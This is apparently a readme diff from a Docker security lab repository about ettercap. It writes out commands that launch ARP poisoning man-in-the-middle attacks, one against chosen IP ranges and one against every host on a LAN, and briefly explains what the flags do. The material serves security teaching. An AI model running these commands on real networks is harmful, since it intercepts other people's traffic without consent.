liranmatcu/Docker_Security_Labs/other_trials/ettercap/readme.md

 -M arp: Initiates a MITM ARP poisoning attack to intercept packets between hosts
 // //: Specifies the entire network as the targets

+ettercap -T -j /tmp/victims -M arp /10.0.0.1-7/ /10.0.0.10-20/
+Will load the hosts list from /tmp/victims and perform an ARP poisoning attack against the two target.
+The list will be joined with the target and the resulting list is used for ARP poisoning.

+ettercap -T -M arp // //
+Perform the ARP poisoning attack against all the hosts in the LAN.
+BE CAREFUL !!

 Reference:
 https://hub.docker.com/r/mrecco/ettercap